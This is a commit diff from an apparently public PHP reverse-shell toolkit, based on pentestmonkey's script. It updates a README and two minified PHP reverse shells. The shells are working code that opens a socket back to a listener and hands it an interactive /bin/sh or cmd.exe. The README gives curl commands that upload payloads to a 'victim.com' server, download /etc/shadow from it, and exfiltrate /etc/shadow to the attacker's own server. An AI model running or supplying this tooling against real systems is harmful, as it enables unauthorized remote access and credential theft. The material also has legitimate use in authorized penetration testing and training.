Small Improvements

README.md

@@ -2,9 +2,9 @@
 
 Just a little refresh on the popular PHP reverse shell script [pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). Credits to the original author!
 
-Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Script will automatically detect an underlying OS.
+Works on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Script will automatically detect the underlying OS.
 
-Works with both `ncat` and `multi/handler`.
+Works with both, `ncat` and `multi/handler`.
 
 Tested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).
 
@@ -30,7 +30,7 @@ Made for educational purposes. I hope it will help!
 
 ## Reverse Shells
 
-[/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) requires PHP v5.0.0 or greater, mainly because `proc_get_status()` is used.
+[/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) requires PHP v5.0.0 or greater.
 
 [/src/reverse/php_reverse_shell_older.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell_older.php) requires PHP v4.3.0 or greater.
 
@@ -48,50 +48,52 @@ Check the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shel
 
 Check the [simple PHP web shell v2](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get_v2.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.
 
-Find out more about PHP obfuscation techniques for older versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!
+Find out more about PHP obfuscation techniques for old versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!
 
 ## File Upload/Download Script
 
 Check the [simple PHP file upload/download script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/files.php) based on HTTP POST request for file upload and HTTP GET request for file download.
 
-When downloading a file, you should [URL encode](https://www.urlencoder.org) the file path, and specify name of the output file.
+When downloading a file, you must [URL encode](https://www.urlencoder.org) the file path, and don't forget to specify the output file if using cURL.
 
-Depending on the server configuration, downloading a file through HTTP GET parameter might not always work, so you will have to hardcore the file path in the script.
+When uploading a file, and don't forget to specify `@` before the file path.
+
+Depending on the server configuration, downloading a file through HTTP GET request parameter might not always work, instead, you will have to hardcore the file path in the script.
 
 ### Case 1: Upload the Script to the Victim’s Server
 
-Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.
+Navigate to the script on the victim's web server with your preferred web browser, or use cURL from you PC.
 
-Upload a file to the victim's server web root directory from your PC:
+Upload a file to the server's web root directory from your PC:
 
 ```fundamental
-curl -s -k -X POST https://victim.com/files.php -F file=@/root/payload.exe
+curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe
 ```
 
-Download a file from the victim's PC to your PC:
+Download a file from the server to your PC:
 
 ```fundamental
-curl -s -k -X GET https://victim.com/files.php?file=/etc/shadow -o shadow
+curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow
 ```
 
-If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.
+If you elevated your initial privileges within your reverse shell, this script might not have the same privileges as the shell. In that case, to download a certain file, you might need to copy the file to the web root directory and set the necessary read permissions.
 
 ### Case 2: Upload the Script to Your Server
 
 From your PHP reverse shell, run the following cURL commands.
 
-Upload a file from the victim's PC to your server web root directory:
+Upload a file from the victim's PC to your server's web root directory:
 
 ```fundamental
-curl -s -k -X POST https://your-server.com/files.php -F file=@/etc/shadow
+curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow
 ```
 
-Download a file from your PC to the victim's PC:
+Download a file from your server's web root directory to the victim's PC:
 
 ```fundamental
-curl -s -k -X GET https://your-server.com/files.php?file=/root/payload.exe -o payload.exe
+curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe
 
-curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe
+curl -skL -X GET https://my-server.com/payload.exe -o payload.exe
 ```
 
 ## Set Up a Listener

src/reverse/minified/php_reverse_shell_mini.php

@@ -1 +1 @@
-<?php class Sh{private $a=null;private $p=null;private $os=null;private $sh=null;private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $b=1024;private $c=0;private $e=false;public function __construct($a,$p){$this->a=$a;$this->p=$p;}private function det(){$d=true;if(stripos(PHP_OS,'LINUX')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}private function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed successfully!\n";}return $e;}private function set(){@error_reporting(0);@set_time_limit(0);@umask(0);}private function d($d){$d=str_replace('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}private function r($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERROR: Cannot read from {$n}, script will now exit...\n";}return $d;}private function w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}private function rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$on,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}$this->d($d);}}private function brw($i,$o,$in,$on){$f=fstat($input);$s=$f['size'];if($this->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$by;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}public function rn(){if($this->det()&&!$this->daem()){$this->set();$soc=@fsockopen($this->a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->des,$ps,null,null);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else{foreach($ps as $p){stream_set_blocking($p,false);}$stat=proc_get_status($proc);@fwrite($soc,"SOCKET: Shell has connected! PID: {$stat['pid']}\n");do{$stat=proc_get_status($proc);if(feof($soc)){echo "SOC_ERROR: Shell connection has been terminated\n";break;}else if(feof($ps[1])||!$stat['running']){echo "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('read'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_select($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERROR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_array($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(($f=fstat($pipes[2]))&&$f['size']){$this->brw($ps[2],$soc,'STDERR','SOCKET');}if(($f=fstat($pipes[1]))&&$f['size']){$this->brw($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fclose($p);}proc_close($proc);}fclose($soc);}}}}echo '<pre>';$sh=new Sh('127.0.0.1',9000);$sh->rn();unset($sh);/*@gc_collect_cycles();*/echo '</pre>'; ?>
+<?php class Sh{private $a=null;private $p=null;private $os=null;private $sh=null;private $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $b=1024;private $c=0;private $e=false;private $sd=true;public function __construct($a,$p){$this->a=$a;$this->p=$p;}private function det(){$d=true;$os=PHP_OS;if(stripos($os,'LINUX')!==false||stripos($os,'DARWIN')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(stripos($os,'WINDOWS')!==false||stripos($os,'WINNT')!==false||stripos($os,'WIN32')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}private function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed successfully!\n";}return $e;}private function sett(){@error_reporting(0);@set_time_limit(0);@umask(0);}private function d($d){if($this->sd){$d=str_replace('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}}private function r($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERROR: Cannot read from {$n}, script will now exit...\n";}return $d;}private function w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}private function rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$on,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}$this->d($d);}}private function brw($i,$o,$in,$on){$s=fstat($i)['size'];if($this->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$by;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}public function rn(){if($this->det()&&!$this->daem()){$this->sett();$soc=@fsockopen($this->a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->des,$ps,null,null);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else{foreach($ps as $p){stream_set_blocking($p,false);}$stat=proc_get_status($proc);@fwrite($soc,"SOCKET: Shell has connected! PID: {$stat['pid']}\n");do{$stat=proc_get_status($proc);if(feof($soc)){echo "SOC_ERROR: Shell connection has been terminated\n";break;}else if(feof($ps[1])||!$stat['running']){echo "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('read'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_select($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERROR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_array($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(($f=fstat($ps[2]))&&$f['size']){$this->brw($ps[2],$soc,'STDERR','SOCKET');}if(($f=fstat($ps[1]))&&$f['size']){$this->brw($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fclose($p);}proc_close($proc);}fclose($soc);}}}}echo '<pre>';$sh=new Sh('127.0.0.1',9000);$sh->rn();unset($sh);/*@gc_collect_cycles();*/echo '</pre>'; ?>

src/reverse/minified/php_reverse_shell_older_mini.php

@@ -1 +1 @@
-<?php class Sh{var $a=null;var $p=null;var $os=null;var $sh=null;var $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));var $b=1024;var $c=0;var $e=false;function Sh($a,$p){$this->a=$a;$this->p=$p;}function det(){$d=true;if(strpos(strtoupper(PHP_OS),'LINUX')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(strpos(strtoupper(PHP_OS),'WIN32')!==false||strpos(strtoupper(PHP_OS),'WINNT')!==false||strpos(strtoupper(PHP_OS),'WINDOWS')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed successfully!\n";}return $e;}function set(){@error_reporting(0);@set_time_limit(0);@umask(0);}function d($d){$d=str_replace('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}function r($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERROR: Cannot read from {$n}, script will now exit...\n";}return $d;}function w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}function rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$on,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}$this->d($d);}}function brw($i,$o,$in,$on){$f=fstat($input);$s=$f['size'];if($this->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$by;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}function rn(){if($this->det()&&!$this->daem()){$this->set();$soc=@fsockopen($this->a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->des,$ps);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else{foreach($ps as $p){stream_set_blocking($p,false);}@fwrite($soc,"SOCKET: Shell has connected!\n");do{if(feof($soc)){echo "SOC_ERROR: Shell connection has been terminated\n";break;}else if(feof($ps[1])){echo "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('read'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_select($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERROR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_array($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(($f=fstat($pipes[2]))&&$f['size']){$this->brw($ps[2],$soc,'STDERR','SOCKET');}if(($f=fstat($pipes[1]))&&$f['size']){$this->brw($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fclose($p);}proc_close($proc);}fclose($soc);}}}}echo '<pre>';$sh=new Sh('127.0.0.1',9000);$sh->rn();unset($sh);echo '</pre>'; ?>
+<?php class Sh{var $a=null;var $p=null;var $os=null;var $sh=null;var $des=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));var $b=1024;var $c=0;var $e=false;var $sd=true;function Sh($a,$p){$this->a=$a;$this->p=$p;}function det(){$d=true;$os=strtoupper(PHP_OS);if(strpos($os,'LINUX')!==false||strpos($os,'DARWIN')!==false){$this->os='LINUX';$this->sh='/bin/sh';}else if(strpos($os,'WINDOWS')!==false||strpos($os,'WINNT')!==false||strpos($os,'WIN32')!==false){$this->os='WINDOWS';$this->sh='cmd.exe';}else{$d=false;echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";}return $d;}function daem(){$e=false;if(!function_exists('pcntl_fork')){echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";}else if(($pid=@pcntl_fork())<0){echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";}else if($pid>0){$e=true;echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";}else if(posix_setsid()<0){echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";}else{echo "DAEMONIZE: Completed successfully!\n";}return $e;}function sett(){@error_reporting(0);@set_time_limit(0);@umask(0);}function d($d){if($this->sd){$d=str_replace('<','&lt;',$d);$d=str_replace('>','&gt;',$d);echo $d;}}function r($s,$n,$b){if(($d=@fread($s,$b))===false){$this->e=true;echo"STRM_ERROR: Cannot read from {$n}, script will now exit...\n";}return $d;}function w($s,$n,$d){if(($by=@fwrite($s,$d))===false){$this->e=true;echo"STRM_ERROR: Cannot write to {$n}, script will now exit...\n";}return $by;}function rw($i,$o,$in,$on){while(($d=$this->r($i,$in,$this->b))&&$this->w($o,$on,$d)){if($this->os==='WINDOWS'&&$on==='STDIN'){$this->c+=strlen($d);}$this->d($d);}}function brw($i,$o,$in,$on){$s=fstat($i)['size'];if($this->os==='WINDOWS'&&$in==='STDOUT'&&$this->c){while($this->c>0&&($by=$this->c>=$this->b?$this->b:$this->c)&&$this->r($i,$in,$by)){$this->c-=$by;$s-=$by;}}while($s>0&&($by=$s>=$this->b?$this->b:$s)&&($d=$this->r($i,$in,$by))&&$this->w($o,$on,$d)){$s-=$by;$this->d($d);}}function rn(){if($this->det()&&!$this->daem()){$this->sett();$soc=@fsockopen($this->a,$this->p,$ern,$ers,30);if(!$soc){echo"SOC_ERROR: {$ern}: {$ers}\n";}else{stream_set_blocking($soc,false);$proc=@proc_open($this->sh,$this->des,$ps);if(!$proc){echo "PROC_ERROR: Cannot start the shell\n";}else{foreach($ps as $p){stream_set_blocking($p,false);}@fwrite($soc,"SOCKET: Shell has connected!\n");do{if(feof($soc)){echo "SOC_ERROR: Shell connection has been terminated\n";break;}else if(feof($ps[1])){echo "PROC_ERROR: Shell process has been terminated\n";break;}$s=array('read'=>array($soc,$ps[1],$ps[2]),'write'=>null,'except'=>null);$ncs=@stream_select($s['read'],$s['write'],$s['except'],0);if($ncs===false){echo "STRM_ERROR: stream_select() failed\n";break;}else if($ncs>0){if($this->os==='LINUX'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(in_array($ps[2],$s['read'])){$this->rw($ps[2],$soc,'STDERR','SOCKET');}if(in_array($ps[1],$s['read'])){$this->rw($ps[1],$soc,'STDOUT','SOCKET');}}else if($this->os==='WINDOWS'){if(in_array($soc,$s['read'])){$this->rw($soc,$ps[0],'SOCKET','STDIN');}if(($f=fstat($ps[2]))&&$f['size']){$this->brw($ps[2],$soc,'STDERR','SOCKET');}if(($f=fstat($ps[1]))&&$f['size']){$this->brw($ps[1],$soc,'STDOUT','SOCKET');}}}}while(!$this->e);foreach($ps as $p){fclose($p);}proc_close($proc);}fclose($soc);}}}}echo '<pre>';$sh=new Sh('127.0.0.1',9000);$sh->rn();unset($sh);/*@gc_collect_cycles();*/echo '</pre>'; ?>